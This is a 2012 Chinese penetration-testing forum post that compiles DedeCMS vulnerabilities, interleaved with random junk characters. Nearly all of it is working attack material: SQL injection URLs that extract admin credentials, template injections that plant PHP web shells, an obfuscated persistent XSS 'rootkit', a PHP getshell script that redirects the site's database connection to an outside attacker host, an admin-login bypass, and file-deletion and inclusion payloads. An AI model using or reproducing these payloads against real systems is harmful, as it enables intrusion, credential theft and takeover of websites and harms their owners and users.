中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]
作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结

- o5 ?1 B8 X, R" j! N2 z+ F/ @5 D) xDedecms 5.6 rss注入漏洞# m& r: t6 ~+ ^( g% b+ e7 H& a
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
, k7 {, o. O8 x( \' _/ s) B# M7 l3 r5 z0 E, Y6 ~
& V6 p4 V. a" s5 J! F) ?% B

+ v; ?5 e9 K  q& A& z  V
# @: {/ |: ?+ t' R% j5 k6 Q) ^) V1 b- Z* J  r! t8 ~) S) ]$ C2 e

! {5 H' m% G9 D
+ [( n+ i* v. ], z/ `
% e8 d9 L4 R# d) Z: p  W- X* R2 PDedeCms v5.6 嵌入恶意代码执行漏洞: G' A: B2 n( O) k+ `: e
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
- E4 z# P. i4 D$ c& ^8 j. m- Z发表后查看或修改即可执行
% y) k: ~) _- G; ba{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}  B, `. f6 s" v! h! O
生成x.php 密码xiao,直接生成一句话。
/ ~! f6 p4 q9 g7 X7 ^& h9 a3 G* o8 C( o* W- w& l
6 M5 _5 d& m" N

! e% K$ B2 y9 L, X0 k% S" [, S! m* d% H, j

9 I: L  @4 n! A  l3 B2 ^
( X8 G1 @, S; n3 V# Z# i* r' z' q0 J
8 o2 E& a1 n% s& U5 L- k. R
Dede 5.6 GBK SQL注入漏洞7 F' a" B0 @, Z, I9 _+ c
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
& g7 r8 ]( m) X/ k) j+ X  |  zhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe0 B' |, P: P/ ]# q8 D
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7* i" N0 E) [' n5 ^+ t6 z
( [9 ]. C4 o' _

( V+ a. b0 S* h
) @5 `6 b  w: L3 P. `" }( f5 I/ B& n

; y/ N+ k) z4 b9 J. V8 L
& s/ ?* }7 G6 h& K7 \; z
' v) a' [) m2 q. y# g; D. w2 K0 h& J; t0 u4 p8 p5 O3 Y
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
: s" p! U6 k" Y9 o3 z* p& P$ phttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`   s7 w7 I2 p# T  Z* V! Y
8 f' W2 F& o# [! R

0 a  E0 w7 @7 i( M
" H% y8 O3 D4 h6 C6 O) r0 K
- }  N' H- g5 [
: d  H" f. T" L8 x& g8 a* {/ p
& `0 W) }& _# s( NDEDECMS 全版本 gotopage变量XSS漏洞
# _6 J1 U0 P. m6 o1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
4 h* a3 u" T6 d" l( P( M7 [* ~4 khttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="' B8 K" k9 g/ M( e

2 P* p7 `2 O" W$ U! ]" K% ^  C2 i
2 P, B0 Q9 E7 J! l+ f2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 + i* j( W* f8 `2 F; k- i
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
- W% c6 I8 n$ I: R
" y! y% X7 j0 z2 Q& U6 O: E$ x! V+ O
http://v57.demo.dedecms.com/dede/login.php- |; \( k1 M9 w0 X
: {! c  ?# f. q# d

6 c# s- Y/ I% Qcolor=Red]DeDeCMS(织梦)变量覆盖getshell
+ Z' w: d, u& L# m9 V& Y: c; k#!usr/bin/php -w" f% u( ^9 V! B1 O
<?php7 w' R) X- v* S2 n
error_reporting(E_ERROR);
. g, J2 E; d5 P6 Pset_time_limit(0);
! c0 L$ }; u2 C, L% y, }print_r('
" A- O! j5 g) U' s8 _. YDEDEcms Variable Coverage
, P, k$ `( Z7 ]) p  |Exploit Author: www.heixiaozi.comwww.webvul.com
  {" p4 Q5 s2 x  C; A5 i! ?);* T! D# @6 I& i6 E( \9 u$ c
echo "\r\n";+ V) N4 d0 F$ {" `8 P0 o
if($argv[2]==null){' h$ }7 s+ Q4 [( P
print_r('
) J  ~$ N- d4 o* b/ J1 n: K) P' A+---------------------------------------------------------------------------+
  c$ {& |. o3 {  u7 LUsage: php '.$argv[0].' url aid path+ \! O& Y1 O' B4 h) u
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/1 R5 J" Q9 B4 ?1 y
Example:. P* l, L, f. q2 y& f
php '.$argv[0].' www.site.com 1 old
5 Z7 {; X$ c; z1 K+ t; O+---------------------------------------------------------------------------+
7 C0 {) b. ]5 Z8 V' _$ h- p');
' T0 W9 R+ n, K2 x% A  Jexit;9 q/ J" |* N  A
}2 m0 v- N6 z6 `: X  H
$url=$argv[1];
. M9 a- L+ p) n3 w  c$aid=$argv[2];1 _7 L8 d$ B; D. v% ^! d8 i& b. w6 `( ?, k
$path=$argv[3];; t# E$ @/ N. a; c% {6 \
$exp=Getshell($url,$aid,$path);" Z% U  V  d/ P9 D
if (strpos($exp,"OK")>12){+ ]$ d. g# M  T6 v9 N. Q
echo "  J6 e6 ^( z0 T6 a3 d: @
Exploit Success \n";
+ d' r# ~7 y- jif($aid==1)echo "7 J' T( p- r0 j6 h' u( o; z8 w/ X
Shell:".$url."/$path/data/cache/fuck.php\n" ;$ s" [0 l" @% f4 f5 O

6 ?" ^; J: @+ U' Z1 f2 |5 W7 n) A5 Z3 x+ _7 R3 c4 |6 u
if($aid==2)echo "2 g  g  R. |" y( E
Shell:".$url."/$path/fuck.php\n" ;3 z' f+ o  B- x$ Y4 {
  j" l( ]3 w0 }% A) l% H* Q9 z
- Y5 U8 x4 ]6 S8 B9 I7 `5 U' q
if($aid==3)echo "
% b$ Y; W* x" b/ WShell:".$url."/$path/plus/fuck.php\n";2 P, v7 p! j7 M# y- e

' Q8 d+ V! v2 S( D/ d
% L) |2 A2 X8 h% ~1 b5 [- x}else{( r1 m# I* N5 m7 W
echo "
$ y  P) g' r& r3 w7 W- yExploit Failed \n";
) `) [: U$ y! f+ a) u}
6 C5 w, e5 X# M- m* v% gfunction Getshell($url,$aid,$path){/ @" U/ M5 l7 m
$id=$aid;
3 l- |. _7 F4 e6 }. Y! G* D$host=$url;  |, ~& q) t& P9 l- z: n9 [
$port="80";
  m  ?  M' O, A" |+ L8 M$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";7 c3 _, {+ i& W/ o7 x$ S& _3 e- x8 e
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";. _* N) b0 ], d) a+ [% ?6 l  L- s
$data .= "Host: ".$host."\r\n";
4 s! E+ B+ I4 m# [$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
% \# D2 G, t2 k5 J' Q, g/ H$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
' j8 w% s% w2 F" H" I" D) C( x6 H$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";/ e; |; ~* M1 d- Q& f6 b
//$data .= "Accept-Encoding: gzip,deflate\r\n";! m4 f5 i. {- W* e, S
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";; b% W7 |* l4 Y7 K/ H3 j
$data .= "Connection: keep-alive\r\n";
, R, z+ j& Z8 m5 R0 o$data .= "Content-Type: application/x-www-form-urlencoded\r\n";( m2 r+ h9 A9 W1 X' h1 r) [
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";1 B( B4 B- _, _* ?* U3 F/ p
$data .= $content."\r\n";2 i9 D$ C* f$ @* z1 l3 k1 F8 u
$ock=fsockopen($host,$port);
8 X8 I0 ^+ w) B0 j4 Q4 ^# tif (!$ock) {
8 @2 t/ ^1 s; K% Becho "9 W9 K2 D7 o! y# C
No response from ".$host."\n";6 N: V2 U! U* a3 M
}
4 u" {7 U  g3 g& I; Hfwrite($ock,$data);, ]* a5 E9 N2 t5 y/ A1 h
while (!feof($ock)) {& l; ]2 d) Q  e9 _% M; L
$exp=fgets($ock, 1024);
; I% a6 ~. l  B: D0 greturn $exp;
7 J! m0 y) i. U}" K6 N* L1 w2 c
}
2 f& u0 |" D' J8 [% \) A* Y/ b1 d

3 ~/ i: ?+ W9 _4 E, A2 R1 ~?>  r& j5 Z+ g* C1 `4 R: K. @2 A6 o

/ M7 l. l; ]9 O/ Z# S1 U  X' {8 f$ E# c
& l( _8 l& u6 W% x2 Y2 ]) O0 a6 o
6 F4 r  G9 T9 e! s0 d1 L/ d+ y: q4 E8 ?
* j$ ], E9 K0 h
6 f3 Y7 }( D# r( @

: b1 q0 B% w. ^  ~7 t: [2 z5 S
. n+ v: D( G( d& P$ Y4 r! a/ t! B( W6 @+ L( W- {
. y! W. _8 U& C8 o$ g% o$ e. B
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
: T: t* J( C6 {8 ?. _http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root2 b4 P$ X8 B$ T4 G
. e- A: n" v9 `: Y' ?

7 Q+ g# Z' ?& B2 r! }& E把上面validate=dcug改为当前的验证码,即可直接进入网站后台
9 N1 y7 M' |$ q  c/ X8 c8 @7 U7 l2 |0 T) ]( v2 m
7 E1 Y$ N& U' G
此漏洞的前提是必须得到后台路径才能实现! d8 b  ?" `5 G5 E7 d
0 J* i. H" b% f0 n

, a: Z$ d- o5 X  Z$ A6 J6 v3 D$ m' l
6 r6 {( r" E1 X' |9 J: ^; j4 c
8 L8 f9 ]/ B' Y) h& P7 j, I' F5 ^8 r

( l* L- I2 ]$ w  J( d0 z$ w
. C3 u; M% v9 g5 i
; m$ h3 ]8 G& o- P- C/ ]5 V* d. H, t+ D9 D6 C6 U
; E* E# a+ a6 z  z
Dedecms织梦 标签远程文件写入漏洞
1 c# h/ P) d( d: [/ r前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');5 B4 A& Q# b' `9 i0 e

8 J0 A% D  d  J# I5 h
: Z' J4 s2 ]& W再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 : Y1 J) Q  B# z: @- K! E# L. }  W5 q
<form action="" method="post" name="QuickSearch" id="QuickSearch"># t2 ]& M/ O1 E% X4 v% f( {+ M
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
4 ?( K4 q% |) ~7 k5 w, l: Y<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />  V/ I, }  X! q4 x; s- I. D/ M
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
2 v0 F; B3 G  o7 X+ ?% A0 w' ~6 @<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />: L; A, C  F$ e- O  @+ ?2 D
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
% e; V7 s) P; Y: m; J<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />! y4 p  S  `" U/ ~* `! U
<input type="text" value="true" name="nocache" style="width:400">7 r' K8 D& S9 e: {$ h% [
<input type="submit" value="提交" name="QuickSearchBtn"><br />
: `9 v, ^" q3 _% H</form>
( L# }+ \' z+ O( @2 [) x<script>
% ]. x; m  q  ^: _" l* Tfunction addaction()
# v: O2 ], }# D2 Q) j' M* i* y/ P{2 O, k2 y! W& g0 Z# r0 S
document.QuickSearch.action=document.QuickSearch.doaction.value;/ B' m# N( Y- V; P9 X1 c
}) @  l  m9 }2 y+ K$ a4 H  f
</script>0 S/ L- P( F, R, R# @

# Z0 q& Z  V& I+ m
# ?+ V4 y4 }3 x3 g# T% Y; Z
4 y8 s& L5 p/ ]+ l# b" O+ b
6 R- y  {+ i9 d* t! Q% M! P8 G' D1 v6 A
% Q$ E, Z( V% V8 h/ R

9 W0 v2 U1 Y( j0 ^0 C' G6 X" ]/ o% q4 Y8 Y

3 h, V* \, R8 X1 |/ N1 N# O9 b
$ {+ ~- C" g- G; x( v- oDedeCms v5.6 嵌入恶意代码执行漏洞
9 K! B3 X7 R! O& U& W: a+ i& R注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
: _9 \6 n5 C- k7 n$ @; A2 ra{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}, c% Q: J3 V. H9 d, g
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得# }" G6 Q( d+ U4 X  q% j% e
Dedecms <= V5.6 Final模板执行漏洞, F' M3 p5 D9 n% _& r6 y1 i
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:+ ~$ v" x: G8 t( ?" q
uploads/userup/2/12OMX04-15A.jpg
" ~  [' k6 Q6 _  s$ ^1 T7 z. o6 M6 e

+ k4 h9 I% O! i3 O" T/ l模板内容是(如果限制图片格式,加gif89a):7 ^  a# t5 Z6 e0 j$ Y
{dede:name runphp='yes'}
; W: W  Q6 _1 D* k) u. o$fp = @fopen("1.php", 'a');8 g* O( O2 \* Y; O, j6 \4 r, o
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");3 z) |+ Q, l( Q& L% J
@fclose($fp);
$ j. j3 C4 @8 C2 m% z{/dede:name}* c$ D7 L  d! P8 c" y$ `# x* a3 J: X
2 修改刚刚发表的文章,查看源文件,构造一个表单:
4 d, f6 k( i5 d$ q<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">) K  Y1 R- B; H
<input type="hidden" name="dopost" value="save" />; T! I# Q! @! L0 q- S
<input type="hidden" name="aid" value="2" />, K: D7 z& n. G
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />7 U  f$ M, d0 k4 v, v" y. Z) _# A/ K
<input type="hidden" name="channelid" value="1" />  W. a8 t9 v3 G* Y) y# x; r+ Z
<input type="hidden" name="oldlitpic" value="" />6 W' W2 _$ }% `0 u5 f; {
<input type="hidden" name="sortrank" value="1275972263" />
# v# [+ \# T& s& v+ {7 V- C, a( n/ j9 b2 T9 d2 o) s' b8 b# C$ Q: b8 U" L

" i! I' w8 J4 c1 i<div id="mainCp">
4 d3 B1 b& v% {' F/ K<h3 class="meTitle"><strong>修改文章</strong></h3>
2 ]6 {8 G+ J8 ~5 d. \3 Q
$ ?1 `9 A. y8 `' J4 m4 t4 B( F4 W) j; e/ O6 Y$ X
<div class="postForm">
: s  S8 Y5 _7 |( Q2 K6 }$ B9 q' j<label>标题:</label>8 V; m) Y8 B$ C$ F4 X" W
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
4 }( ~/ L; B' l4 p9 P, C  L1 R1 x( h- c, a
. p- F0 p, p) r8 H; l& g7 g
<label>标签TAG:</label>. b, t* H$ G4 S* p4 [8 k6 Q9 L# O
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
) P+ ~5 Q# m  T0 X
/ u0 [  N3 Z" \2 y& e
3 y( A( i, u) R- r; s. k<label>作者:</label># r# f( f# d( ~3 ~/ T& \# J
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
: }# X. R! ]4 N% C" w. E
9 [, S) a; o8 ?8 N! ]# X! Y$ V9 g9 G8 w8 W( \3 u( U+ \6 ^
<label>隶属栏目:</label>
3 T$ Q! D( P5 _<select name='typeid' size='1'>
6 e& Q* }& _' B$ [6 w<option value='1' class='option3' selected=''>测试栏目</option>$ `5 F" C1 W7 d1 U5 _, W
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
. }( q+ r# t1 c3 A; e8 b' y9 X4 z- e8 q' a0 ^

7 v0 P' m2 i4 p0 p<label>我的分类:</label>
  q( H5 H& Y% v& J( C5 q9 W<select name='mtypesid' size='1'>0 f  D0 b$ Q# l5 L  I
<option value='0' selected>请选择分类...</option>
. F  w/ m2 U! b7 q, Y: D<option value='1' class='option3' selected>hahahha</option># C6 A2 u) i6 V$ s' ?5 F
</select>
7 t$ ^. k- M/ g# P4 V' `
) U) M7 l- u# z7 [" F4 P9 V2 |# R- c8 V* F7 |
<label>信息摘要:</label>
& [/ t6 V5 a/ S, T<textarea name="description" id="description">1111111</textarea>
$ V7 x( a5 R, t+ E/ _3 S$ e(内容的简要说明)/ g$ j  Z" ?: s

; G; j& i7 l+ u- z7 d7 q) D$ r( W5 ^1 A
+ Y( s) M  n. q/ z4 G, q<label>缩略图:</label>" C, z; ]7 n5 p; u8 [* J
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>$ p% g1 t7 M. E; J! s: d
$ z/ y2 k/ H$ `) O% F
2 R( U3 J' h) l. L6 N$ m
<input type='text' name='templet'+ `) ]5 G6 t/ u/ E6 j9 i6 i
value="../ uploads/userup/2/12OMX04-15A.jpg">
" r( b6 b$ m9 S<input type='text' name='dede_addonfields'
) H" m" y# |; G" d' w# a+ hvalue="templet,htmltext;">(这里构造)# x( u! c, W. r; C) u, R* R
</div>
4 f# E& A/ \( ?1 Y* L" E- Y8 j
9 ~/ L& v! ?) C+ O0 Y/ L% H! @/ y" \8 A. h; `
<!-- 表单操作区域 -->* g; c0 B' Z5 E7 ]$ t
<h3 class="meTitle">详细内容</h3>
) j7 i& \/ {( Q$ F4 f% b+ [, s, Y

6 z9 d+ |; i9 C" m# i& S( F( O<div class="contentShow postForm">6 v' N! J$ a' Q
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
3 ^+ T( Z* W1 {. a, U+ {& u( Y; c. ~% u* d

4 ~' w" `. o8 t0 q# C5 p4 W<label>验证码:</label>
4 ~" x% H3 z8 k: B2 g. p6 u% u<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />. Z7 j+ ?) q8 v6 e& A0 w; S0 @9 w
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
3 v" V0 a4 \" b% [0 S+ c( u+ B9 @1 h( e6 x
9 B, Z8 f$ k$ g. [
<button class="button2" type="submit">提交</button>
  v8 v  E6 l+ |! g& H<button class="button2 ml10" type="reset">重置</button>
; F& I4 ]; G  y+ t$ e</div>
1 {9 y% f6 x: s5 {0 B' ?9 E
) }; F- w& S1 }: Q, w, c) e- e7 Z. W8 |
</div>% L" ?9 ~5 [- K7 o" c+ c
: a+ L$ B( k( h2 ~) t8 Z
4 `  Q) k# m/ _& K- n8 A
</form>
3 Z3 i+ z  ?/ M# Y0 v8 c0 x/ m9 |8 o0 _9 V. A
8 {6 E6 h  D+ U( c9 y9 R5 H; d
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:! a# D5 ^) U( [
假设刚刚修改的文章的aid为2,则我们只需要访问:
$ ]! S$ I) W7 z: {* S$ ^, {6 W* y3 b% q+ Ehttp://127.0.0.1/dede/plus/view.php?aid=2* q* o3 I0 z9 ]% H+ `
即可以在plus目录下生成webshell:1.php
% C6 D: k0 r: L$ e2 A; A, ]: ~# U/ S4 l0 G- X6 z
$ f; j7 d$ P3 q4 b0 N& s/ r; a

0 N! ^# W# E+ V" q9 i1 G) @6 O6 a7 k) |2 M; n# b% L% W
% ~% s5 E7 l& d4 s

* t3 c' c7 W. X; N( q, S0 f9 B# s7 x3 n: _% w( ^) U5 \' R# |

  ]' p  a8 m( n& U  g$ I! B
" u% x) J7 X( A8 E0 b1 }# H; U* T) c' D* J
5 v3 `  c0 ?) Z  g/ s  d3 j
$ k# H8 Y) j% I! n7 C* c+ @& P( @
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)2 r; t! v) b4 \! h' K5 ^, Z
Gif89a{dede:field name='toby57' runphp='yes'}; l7 h7 z- K! o5 p: Y* N
phpinfo();
& w2 k6 f. Y/ {6 d{/dede:field}4 D. S# i. }# Q+ D% F3 L4 P% I0 ~. h
保存为1.gif0 n8 ]4 Y+ W6 F
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> : |) E! ?( B2 H: n
<input type="hidden" name="aid" value="7" />
- M% {4 B7 t# b" Z! P<input type="hidden" name="mediatype" value="1" />
. J, ~1 |9 d8 |  v<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
' o7 k, q4 v. W3 B<input type="hidden" name="dopost" value="save" />
( G6 ]9 }- j) t! D: @& v& R+ V<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 9 q! g" x9 Y3 l% _& e
<input name="addonfile" type="file" id="addonfile"/> * D; H3 g; t( t9 V6 r; |
<button class="button2" type="submit" >更改</button> ! Z$ I+ W- [% e6 M! E" i
</form> 2 N: z9 P8 W8 c9 N% V  `

( G+ A/ L! P$ _" L6 `" x& V5 g3 I7 J
! O. r, W7 w- T) F6 w5 {& n构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
2 b% a& G& W( w( _) r' U1 @" B" j# L/ \发表文章,然后构造修改表单如下:- e, s$ {: o! E' p: P

1 R/ O" D9 }$ c) k1 y6 R
( I$ i+ u; R4 W0 i# u, }5 x<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
2 f  |+ I7 s: R* q* z; i9 @<input type="hidden" name="dopost" value="save" />
; B/ L# M$ H, S7 x<input type="hidden" name="aid" value="2" /> $ @( v# ^& f$ k3 |" o! B: ?5 e
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
7 A) j/ T; J' y3 i<input type="hidden" name="channelid" value="1" />
/ K, d7 s" ^9 D+ q; _<input type="hidden" name="oldlitpic" value="" />
0 P' P5 f" R: V7 K: x2 [" V<input type="hidden" name="sortrank" value="1282049150" />
- |5 M3 x: b  M8 o  r. L<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> " x6 `) j' f6 \7 B: t
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> ( P  J4 M0 \; p. _. D
<select name='typeid' size='1'>
5 E8 l' T! {  V. ?/ ]<option value='1' class='option3' selected=''>Test</option>
( y0 Y- {& F) Z1 X7 L<select name='mtypesid' size='1'>
3 t+ p5 j$ f# j9 b+ r; x) G<option value='0' selected>请选择分类...</option> * w2 J' L7 K% D' N+ ^* b0 [
<option value='1' class='option3' selected>aa</option></select> 3 Q6 h) `: X7 j* I7 T8 L
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 3 Z' w. y+ A  w, e: ^& n  u
<input type='hidden' name='dede_addonfields' value="templet"> ! W) v' x* J" p# v' p& w, `
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> / p" m( m( ?( i0 s9 U& N5 {
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> . C' C% q: ~' t# ]0 x
<button class="button2" type="submit">提交</button>
& d, _- o/ V2 k) g* M' [$ d% k, i</form>
" Y9 {2 \  G6 z% c# ?( a: S7 t5 ?' v9 i* w

4 F3 |1 o, K1 H8 {2 Y5 Y" f/ g# K2 O3 K4 r$ I, n: h2 C
/ e0 F* o) m7 n! F
, p* X  A+ a) c" p6 P9 H

  d8 c: }2 I8 h% S
6 s" N$ _* y5 X9 j5 J9 p7 B7 H5 t8 u- m3 Z/ m
3 U. `8 H# w. O5 L9 B5 q
2 @5 \; r- z2 V' m

1 G" m( V; W: R# `& Z+ ~3 T) {' f% w) Z) m
织梦(Dedecms)V5.6 远程文件删除漏洞3 o7 [" {4 g  y- `9 Z
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif6 w4 C5 M6 j; @4 ]+ |2 `
/ Z2 U2 F; I3 U& _1 e& N( o2 l
& i8 [/ \0 x+ j9 p8 J, u

: l& b4 F( n/ T+ K5 G7 T$ K6 `8 E4 y7 {# f, }7 l8 {

: Q0 m  ~* O* h# s3 I) G& y& A# L3 P0 c5 H5 h+ y

: f  u3 t) ^' c! v! d* M% G/ X' Z1 I4 L* o
5 N4 g  @8 U# A
4 t9 v0 z% O0 }9 ^" t. I# M( n# G& ?$ ]
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 . H. Q% J/ T) |
http://www.test.com/plus/carbuya ... urn&code=../../: d. R7 I5 ], n& f4 `9 P9 l7 R) k( n
# h; L8 a" n6 A' v! T+ O8 H
) a: o# e- N8 F/ H0 m/ K  {

. X: H2 k# K0 Z! s6 W9 D" |! h0 ~5 k. b$ N8 _  B: x) t; Q

8 Q8 z0 v: V, `( T( R; I8 d' F$ p: x0 G. o

  ?; ^* W6 v6 R/ n6 K
+ w. n$ N' F) y; N2 y# ?" q+ `' w
6 u& r% t0 s9 _3 Z0 \. H5 G0 {" J; j) c( M6 M8 P
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 - w/ M3 f3 x9 @3 n/ C: n
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`  z) b* w' P0 g5 s* }
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
% [+ v1 D- }/ M$ w
/ c" B7 m4 t2 f! p6 F3 Q! H0 `  ]1 `# q3 H5 I% e

8 `% ~, S- u* i8 l. _% y, \) c4 _) M  R0 I- ^
9 f& S0 C0 n: s5 _9 G3 W
% q6 e! t' x* s) N9 w/ L

' v/ w: V4 i/ J' ?! s, P8 s2 R
4 v# t5 ~  K9 B# o, ?! {- N) U/ ~# q- r' }

# }* F7 f1 i$ M$ L  ]% Z+ `  ]织梦(Dedecms) 5.1 feedback_js.php 注入漏洞3 a7 f  `6 d, `& V
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
  E# n) Q0 _8 J( g5 x( H4 `" s7 V: R  t% P" i3 ^: K) K; G

, @  Z; h' ~0 u7 V
